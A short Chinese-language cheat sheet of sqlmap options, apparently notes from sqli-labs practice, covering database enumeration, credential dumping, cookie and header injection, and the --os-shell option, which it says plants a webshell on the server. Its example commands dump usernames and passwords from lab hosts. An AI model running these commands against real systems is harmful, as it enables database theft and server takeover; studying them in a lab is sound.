基本语法
基本步骤
- u URL
 - --users
 - --banner
 - --dbs 列出当前数据库中的所有数据库
 - --tables 列出所有表
 - --columns 列出所有列
 - --dump 获取数据
 
sqlmap -u "http://192.168.10.240/Less-1/?id=1" -D security -T users -C username,password --dump
高级用法
#POST
-r request.txt 
-u "" --data ""
--flush-session  不使用上次跑过相同网站的缓存文件 重新开始
--random-agent   随机选取user-agent头部去发送
-v               显示sqlmap跑的信息  比如 -v3  显示发送的payload 
--level          去根据不同的注入点的位置 例如 cookie位置 例如user-agent位置来进行测试
--risk           发送更多的攻击代码 
--delay          延迟发送  
--force-ssl      如果目标是https的网站 加上此参数 
--os-shell       原理 就是利用mysql写文件的方式 给服务器上写一个sqlmap版本的马文件 并直接进行连接操作
--sql-shell      相当于直接连接到数据库下 执行sql语句在本地 
--refere         进行referer的伪造 若要对referer参数进行注入 --level 值大于等于三
--cookie         跑登录之后的链接地址 使用
设置分隔符
--param-del=";"
请求头注入的语法
- 在指定的header字段后加*
 
设置cookie
- --cookie
 - --cookie-del 分隔符
 - --load-cookies 读取特定Netscape/wget文件
 - --drop-set-cookie 忽略set-cookie
 - level 2以上
 - less 20
 
sqlmap -r less20 --level 2 -p uname --dbs 
level
- level3检查UA、referer
 - level2检查cookie
 
risk
前缀后缀
- --prefix
 - --suffix
sqlmap -u 'http://192.168.1.101/Less-3/?id=1' --prefix="')" --suffix="AND ('abc'='abc" --dbs --flush-session 
性能优化
- --threads
 - --keep-alive
 - --technique:
B:布尔盲注
E:报错
U:联合
S:堆叠
T:时间
Q:内联查询